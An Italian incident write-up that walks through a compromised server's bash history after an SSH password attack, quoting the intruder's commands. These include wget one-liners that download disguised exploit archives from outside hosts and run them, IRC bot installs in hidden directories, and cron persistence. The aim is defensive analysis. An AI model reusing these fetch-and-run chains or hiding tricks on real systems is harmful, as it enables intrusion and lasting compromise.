Qualche giorno fa mi è stata segnalata da un cliente una violazione su un suo server. Fortunatamente è stato possibile accedere al file bash history, il cui contenuto sarà (parzialmente) reso disponibile. Conoscere la sequenza di comandi utilizzati dai malintenzionati per violare i nostri sistemi (e/o quelli dei nostri clienti) aiuta a rilevare le intrusioni future simili ed è quindi importante tenere conto di ogni singolo dettaglio.

La violazione in oggetto riguarda un attacco atto ad ottenere la password di accesso via SSH. In pratica il malintenzionato, in questa occasione, ha fatto uso di un bot IRC che lo aiutasse nella scannerizzazione delle porte SSH su altri sistemi collegati.

Ma andiamo con ordine, analizzando le singole fasi che troviamo nel file history.

1) Il malintenzionato cerca di saperne di più sul sistema nel quale ha appena fatto irruzione, in questo modo:

uptime
uname -a
w
ifconfig

si rimanda alle rispettive guide per la comprensione dei comandi sopra citati e di quelli a seguire:

man nomecomando


2) L'attaccante scarica tutti i possibili root exploit, sperando in un colpo di fortuna. Notare come alcuni file *.tar  siano dotati di una per nulla innocente, ma visibilissima, estensione *.jpg o *.pdf. Sarebbe cosa gradita equipaggiarsi di un proxy server il cui filtraggio dei file sia tarato sia in base ai tipi MIME che sui magic bytes e non sulla singola estensione:

wget http://i......go.ro/exploit.jpg ; tar xzvf exploit.jpg ; rm -rf exploit.jpg ; cd exploit ; ./mv ; id
wget http://m......co.uk/sandu/ex.tgz ; tar zxvf ex.tgz ; cd e ; chmod +x * ; ./exploit ; id
wget http://g......at.ua/2.6.32.tgz ; tar zxvf 2.6.32.tgz;rm -rf 2.6.32.tgz ; cd uid0 ; ./uid
wget http://g......at.ua/expl.pdf ; tar zxvf expl.pdf ; rm -rf expl.pdf ; cd w ; ./wunderbar_emporium.sh
wget http://c......org/god.jpg;tar zxvf god.jpg ; rm -rf god.jpg ; cd .ICE-UNIX ; ./autorun ; ./run

Non sappiamo se qualcuno dei tentativi abbia avuto successo. Il comando id o qualunque root exploit utilizzato non lasciano tracce all'interno del file history.

In ogni caso, data la minore importanza di questa ultima osservazione, passiamo alla fase successiva.

3) l'attaccante decide di fare uso di alcune chicche. Il file virus.tar, presente nel listato successivo, non è in realtà un virus ma una copia di EnergyMech, un bot IRC. Si noti come il malintenzionato abbia utilizzato l'editor nano per modificare il file config, segno che ci dice che non abbiamo a che fare con un utente avanzato in ambito Unix-like.

Un vero Unix hacker avrebbe fatto uso di vi, sia per motivi di etichetta, sia per il fatto che vi è presente su tutte le versioni di Unix e distro GNU/Linux.

Si noti anche come egli chiama il bot all'avvio, con il nome Evolution, con la speranza, probabilmente, che un amministratore di sistema incuriosito si lanci in una analisi occasionale, lasciando potenziali e preziose tracce:

/sbin/ifconfig -a | grep inet
wget http://f......com/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./autorun
./start Evolution

E' stata rilevata l'installazione di un altro bot IRC, Eggdrop (egg.tgz). Si noti come l'attaccante preferisca mettere i file in una directory chiamata " " (spazio singolo).

mkdir " "
cd " "
ls -a
wget http://c.......org/egg.tgz
cd " "
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl
pwd

4) il malintenzionato vuole assicurarsi l'accesso per le prossime volte e configura il demone cron per poter riprendere automaticamente i processi lasciati in sospeso:

crontab -l
crontab -e
exit

Da una prima e rapida constatazione possiamo ritenerci fortunati: l'attaccante in questione non rietrava nelle cerchie degli hacker avanzati e ciò si evince non solo per la questione dell'editor di testi preferito ma anche, e soprattutto, in quanto il file history non è stato cancellato.

Da questa esperienza abbiamo imparato quanto sia importante equipaggiare il proprio sistema con password robuste, di quanto i bot IRC possano essere pericolosi e di come sia importante settare un sistema di filtraggio di tipo combinato MIME/magic bytes per i file in download.